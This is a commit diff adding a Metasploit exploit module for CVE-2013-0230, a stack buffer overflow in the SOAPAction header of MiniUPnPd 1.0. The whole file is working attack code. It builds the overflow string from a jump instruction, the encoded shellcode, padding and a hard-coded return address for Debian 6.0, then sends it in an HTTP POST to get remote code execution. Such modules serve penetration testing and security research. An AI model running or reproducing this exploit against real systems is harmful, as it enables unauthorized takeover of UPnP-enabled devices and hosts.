Land rapid7#1843, @viris exploit for CVE-2013-0230

jvazquez-r7 · jvazquez-r7 · commit 0bf2f51622ff · 2013-06-04T08:52:09.000-05:00
diff --git a/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb b/modules/exploits/multi/upnp/miniupnpd_soap_bof.rb
@@ -0,0 +1,112 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	 http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	include Msf::Exploit::Remote::HttpClient
+  Rank = NormalRanking
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'						=>	'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
+			'Description'		 =>
+				%q{
+					This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability present
+					in the SOAPAction HTTP header.
+				},
+			'Author'					=> [ 'Dejan Lukan' ],
+			'License'				 => MSF_LICENSE,
+			'DefaultOptions'	=> { 'EXITFUNC' => 'process', },
+			# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
+			# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
+			# of the program is never reached)
+			'Payload'				 => { 'Space' => 2060, 'BadChars' => "\x00\x22", 'DisableNops' => true },
+			'Platform'				=> 'linux',
+			'References'			=> [
+				[ 'CVE', '2013-0230' ],
+				[ 'OSVDB', '89624' ],
+			],
+			'Targets'				 =>
+				[
+					['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
+				],
+			'DefaultTarget'	 => 0,
+			'Privileged'			=> false,
+			'DisclosureDate'	 => 'Mar 27 2013',
+			))
+
+			register_options(
+			[
+				Opt::RPORT(5555),
+			], self.class)
+	end
+
+	def exploit
+		#
+		# Build the SOAP Exploit
+		#
+		# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
+		sploit	= "\xeb\x2d"
+
+		# a valid action
+		sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
+
+		# payload
+		sploit += payload.encoded
+
+		# nops
+		sploit += rand_text(target['Offset'] - sploit.length - 16)
+
+		# overwrite registers on stack: the values are not used, so we can overwrite them with anything
+		sploit += rand_text(4)		 # overwrite EBX
+		sploit += rand_text(4)		 # overwrite ESI
+		sploit += rand_text(4)		 # overwrite EDI
+		sploit += rand_text(4)		 # overwrite EBP
+
+		# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
+		# stack points directly to the string after 'Soapaction: ', which is why we must
+		# throw the first value on the stack away, which we're doing with the pop ebp
+		# instruction. Then we're returning to the next value on the stack, which is
+		# exactly the address that we want.
+		sploit += [target.ret].pack('V')
+
+		# the ending " character is necessary for the vulnerability to be reached
+		sploit += "\""
+
+		# data sent in the POST body
+		data =
+			"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
+			"<SOAP-ENV:Envelope\r\n" +
+			"	SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
+			"	xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
+			">\r\n" +
+			"<SOAP-ENV:Body>\r\n" +
+			"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
+			"</ns1:action>\r\n" +
+			"</SOAP-ENV:Body>\r\n" +
+			"</SOAP-ENV:Envelope>\r\n"
+
+
+		#
+		# Build and send the HTTP request
+		#
+		print_status("Sending exploit to victim #{target.name} at ...")
+		send_request_cgi({
+			'method'	=> 'POST',
+			'uri'		 => target_uri.path,
+			'headers' => {
+				'SOAPAction' => sploit,
+			},
+			'data'		=> data,
+		})
+
+		# disconnect from the server
+		disconnect
+	end
+end
